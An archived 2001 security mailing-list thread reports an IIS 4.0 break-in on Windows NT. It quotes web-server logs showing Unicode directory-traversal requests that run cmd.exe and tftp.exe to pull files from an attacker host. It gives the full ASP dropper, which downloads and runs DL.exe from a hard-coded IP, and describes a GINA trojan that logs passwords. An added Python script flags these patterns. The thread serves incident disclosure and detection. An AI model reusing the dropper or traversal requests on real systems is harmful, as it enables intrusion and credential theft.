Security Incidents mailing list archives

Re: Some details in a recent NT hack we encountered


From: Ron Grove <rgrove () HOTMAIL COM>
Date: Sun, 25 Feb 2001 22:21:11 -0700

I sent an update after this posting that explains what we found on that
after some more investigation.  I have appended it below your message.  In
short the log was created by a trojan called NewGina.dll.  We knew it had to
be created by something that was associated with logons so msgina.dll (or in
our case awgina.dll) was a good place to start.  Searching for "gina" turned
up "NewGina.dll" which immediately explained what was going on and was what
was creating the logs (to answer that question).  Some redirection in the
registry was how the intercept was pulled off.  We suspect a kit, because
everything about the breakin appeared to lack skill or polish.  Easy to
catch quickly and didn't clean anything up.  With the access he had one
would expect better...  They used the unicode thing to load dl.exe and
company.  I don't know exactly where he got SYSTEM access, but I expect
somehow through dl.exe?  If anyone wants it it's all theirs of course.

Ron

I have CC:'d you because I don't know how long before this actually gets
posted.  The moderator appears to be (very understandably) less aggressive on
Friday afternoons and weekends. :-)  You wouldn't have seen it until Monday
if it were me at the helm...

From: Gossi The Dog <gossi () OWNED LAB6 COM>
Reply-To: Gossi The Dog <gossi () OWNED LAB6 COM>
To: INCIDENTS () SECURITYFOCUS COM
Subject: Re: Some details in a recent NT hack we encountered
Date: Wed, 28 Feb 2001 21:48:23 +0000

On Sat, 24 Feb 2001, Ron Grove wrote:

> Hello,
>
> Just wanted to share some of the footprints of a hack that we had on a

<snip>

Ok, three points here.

First off, the IIS unicode exploit does not give you SYSTEM or
Administrator privs.  So how are they getting those (they'll need them to
make those dirs and set permissions etc).

Secondly, what program is generating those WinLogon logs?  Not seen that
before at all, very interesting.

Thirdly, could this be a worm?  If it is, erm, eek.

Regards,
Gossi.

Just wanted to share some of the footprints of a hack that we had on one of
our NT servers.  This is not everything I am sure.  It was too important to
rebuild and secure the server for the users' usage again.  If anyone else has
noticed this please let me know.  We are curious what else was put on the
machine beyond what we found.  Attempts were made against other servers as
well.

Config:
Windows NT 4.0 with SP6a
Runs Exchange 5.5 SP4, IIS 4.0, MS Proxy Server 2.0

Initially noticed logfile problem with UNICODE exploit.  Then noticed
os2srv.exe running in taskmanager and as a service.  os2srv.exe was then
killed and sud.exe appeared out of nowhere in processes.  Can't find sud.exe
so find is possibly trojaned.

They initially got in with the UNICODE exploit from a few months back.  Here
is the snip from the logs:

xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:28, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
234, 140, 1650, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe,
/c+dir+c:\,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:41:54, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
188, 141, 379, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe,
E.asp+-r,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:20, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
16, 142, 396, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe,
/c+del+E.asp,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:26, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
2265, 163, 415, 502, 0, GET, /scripts/../../winnt/system32/tftp.exe,
-i+rooted.ntserver.com+get+E.asp,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:34, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
1781, 101, 225, 200, 0, GET, /scripts/E.asp, -,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:37, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
15, 196, 355, 502, 0, GET, /scripts/../../winnt/system32/attrib.exe,
E.asp+-r,
xxx.xxx.xxx.xxx, -, 2/15/01, 20:42:41, W3SVC1, OURSERVER, xxx.xxx.xxx.xxx,
15, 197, 355, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe,
/c+del+E.asp,

We contacted the source IP who had been contacted by another attacked site.
A CERT report was already generated by the other party.  The text of E.asp
is:

<%
Set fs = CreateObject("Scripting.FileSystemObject")
Set drv = fs.Drives
dmax = ""
dmac = 0
For each d in drv
If d.Driveletter <> "A" And d.IsReady Then
If d.AvailableSpace > dmac then
dmac = d.AvailableSpace
dmab = d.DriveType
dmaa = d.TotalSize
dmad = d.SerialNumber
dmax = d.DriveLetter
End If
End If
Next
filename = server.mappath("dl.bat")
Set tf = fs.CreateTextFile(filename, True)
tf.WriteLine("@echo off")
tf.WriteLine("cd \Inetpub\scripts")
tf.WriteLine("startDL:")
tf.WriteLine("tftp.exe -i 216.205.125.115 get DL.exe")
tf.WriteLine("if not exist DL.exe goto startDL")
tf.WriteLine("start /w DL.exe")
tf.WriteLine("ren 00.D install.bat")
tf.WriteLine("attrib TFTP* -r")
tf.WriteLine("attrib DL.exe -r")
tf.WriteLine("del TFTP*")
tf.WriteLine("del DL.exe")
tf.WriteLine("install.bat %1")
tf.WriteLine("exit")
tf.Close
dim command
dim wshShell
command = server.mappath("dl.bat") & " " & dmax
On Error Resume Next
Set wshShell = CreateObject("WScript.Shell")
wshShell.Run (command)
If Err Then
Set objFSO = Server.CreateObject("scripting.filesystemobject")
pathname = server.mappath("dl.bat")
objFSO.DeleteFile pathname
Set objFSO = Nothing
Else
Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" &
dmad
End If
%>
----------------------------
This file downloads DL.exe from the remote host, executes it (which
uncompresses a group of files) then runs an install.
A directory listing follows:
-----------------------------
09/24/1997  12:06a               1,942 environ.ksh
09/24/1997  12:06a               1,323 profile.ksh
02/20/2001  04:52p               1,289 E.asp
02/20/2001  05:11p               5,120 DL.exe
02/20/2001  05:12p               2,201 00.D
02/20/2001  05:12p                  64 01.D
02/20/2001  05:12p              32,256 02.D
02/20/2001  05:12p                 344 03.D
02/20/2001  05:12p             349,696 04.D
02/20/2001  05:12p              28,672 05.D
02/20/2001  05:12p              24,576 06.D
02/20/2001  05:12p              70,211 07.D
02/20/2001  05:12p              18,276 08.D
02/20/2001  05:12p              28,432 09.D
02/20/2001  05:12p              35,981 10.D
02/20/2001  05:12p             427,520 11.D
02/20/2001  05:12p              12,288 12.D
02/20/2001  05:12p               6,867 13.D

00.D gets renamed to install.bat, then executed.

A new directory also appears about this time.  It is found on a different
drive (in our case E:\ since D:\ was the CDROM).  It is under a new
directory called E:\Adminback0801\root\system\dll and nothing is in it.

In the C:\Winnt\System32\os2\ directory a new hidden folder called "New" was
present.  It contained:
FireDaemon.exe
dir.txt
login.txt
RemScan.txt
SUD.exe
SUD.bak

Its security was set to SYSTEM Full Access.  FireDaemon was used to create
an INDEX service and an OS2SRV service.

A trojan .dll was placed in C:\Winnt\System32 called NewGina.dll.
HKLM/Software/Windows NT/Software/Winlogon/NewGina key was created with the
path to the NewGina trojan.  A key called OriginalGinaDll was created with
pcAnywhere's awgina.dll entry.  NewGina.dll creates a .tmp file on C:\ that
captures logon passwords.  It is appended to with the current password after
every logon so that changed passwords are also caught.  The file is
formatted and produced by the NewGina.dll and contains the following text:

WlxNegotiate.
WlxInitialize.
WlxDisplaySASNotice.
WlxLoggedOutSAS, SasType=1.
WlxDisplaySASNotice.
WlxDisplaySASNotice.
WlxLoggedOutSAS, SasType=1.
user Administrator has logged on to domain OURSERVER with password
CURRENT_ADMIN_PASSWORD.
user is a member of the Administrators group.
returned profile information:
  type 2
  profile path: (null)
  policy path: \\OURSERVER\netlogon\ntconfig.pol
  server: \\OURSERVER
  LOGONSERVER=\\OURSERVER
WlxActivateUserShell.
WlxLoggedOnSAS, SasType=1.
WlxDisplayLockedNotice.
WlxWkstaLockedSAS, SasType=1.
WlxLoggedOnSAS, SasType=1.
WlxDisplayLockedNotice.
WlxIsLockOk.
WlxDisplayLockedNotice.
WlxIsLockOk.
WlxDisplayLockedNotice.
WlxWkstaLockedSAS, SasType=1.
WlxLoggedOnSAS, SasType=1.
WlxDisplayLockedNotice.
WlxIsLockOk.
WlxDisplayLockedNotice.
WlxWkstaLockedSAS, SasType=1.
WlxLoggedOnSAS, SasType=1.

A new ftp server is also installed called UServ or something like that (I
forget right now).  Too much to try to clean so rebuilding and securing is
probably the best route.

Hope this helps someone.

Thanks,
Ron
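Added example, not code from the thread: a small triage script for IIS log lines in the Microsoft IIS format Ron posted. It flags the parent-directory traversal into winnt\system32 (including the overlong "%c0%af" form that IIS decoded after its path check, MS00-078), tftp.exe fetches, and the later request for whatever file tftp staged. The log lines, IP addresses and the exact indicator wording are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample in the Microsoft IIS log format shown in the post: client, user,
# date, time, service, server, server IP, time taken, bytes in, bytes out, HTTP
# status, Win32 status, method, URI stem, URI query (IPs are made up).
SAMPLE_LOG = """\
10.0.0.5, -, 2/15/01, 20:40:01, W3SVC1, OURSERVER, 10.0.0.1, 12, 100, 2100, 200, 0, GET, /default.htm, -,
10.0.0.9, -, 2/15/01, 20:41:28, W3SVC1, OURSERVER, 10.0.0.1, 234, 140, 1650, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir+c:\\,
10.0.0.9, -, 2/15/01, 20:42:26, W3SVC1, OURSERVER, 10.0.0.1, 2265, 163, 415, 502, 0, GET, /scripts/../../winnt/system32/tftp.exe, -i+rooted.ntserver.com+get+E.asp,
10.0.0.9, -, 2/15/01, 20:42:34, W3SVC1, OURSERVER, 10.0.0.1, 1781, 101, 225, 200, 0, GET, /scripts/E.asp, -,
10.0.0.9, -, 2/15/01, 20:43:00, W3SVC1, OURSERVER, 10.0.0.1, 20, 120, 300, 404, 0, GET, /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe, /c+dir,
"""

# Overlong UTF-8 forms of "/" and "\" (the "unicode" bug, MS00-078). They are
# invalid UTF-8, so unquote() would not reproduce them; map them first.
OVERLONG = re.compile(r"%c0%af|%c1%9c", re.I)

def normalize_stem(stem):
    # Decode a URI stem roughly the way the vulnerable IIS did.
    return unquote(OVERLONG.sub("/", stem)).replace("\\", "/").lower()

def parse_line(line):
    fields = [f.strip() for f in line.rstrip(",").split(", ")]
    if len(fields) < 15:
        return None
    return {"client": fields[0], "time": fields[3], "status": fields[10],
            "stem": normalize_stem(fields[13]), "query": fields[14].lower()}

def indicators(rec, fetched):
    """Reasons this request matches the post's pattern; also records tftp targets."""
    name, reasons = rec["stem"].rsplit("/", 1)[-1], []
    if "/../" in rec["stem"]:
        reasons.append("parent-directory traversal in URI")
    if "/winnt/system32/" in rec["stem"]:
        reasons.append("system binary reached through the web root")
    if name == "tftp.exe" and "+get+" in rec["query"]:
        target = rec["query"].split("+get+", 1)[1].split("+")[0]
        fetched.add(target)
        reasons.append("tftp download of " + target)
    if name in fetched:
        reasons.append("request for a file staged earlier via tftp")
    return reasons

def analyze_iis_log(text):
    # Returns (time, client, status, reasons) for every suspicious request, in order.
    findings, fetched = [], set()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and (reasons := indicators(rec, fetched)):
            findings.append((rec["time"], rec["client"], rec["status"], reasons))
    return findings
```

Note that the 502 status on the tftp.exe and attrib.exe lines in the original post does not mean the command failed; cmd.exe ran but returned no HTTP body, so status alone is a poor filter.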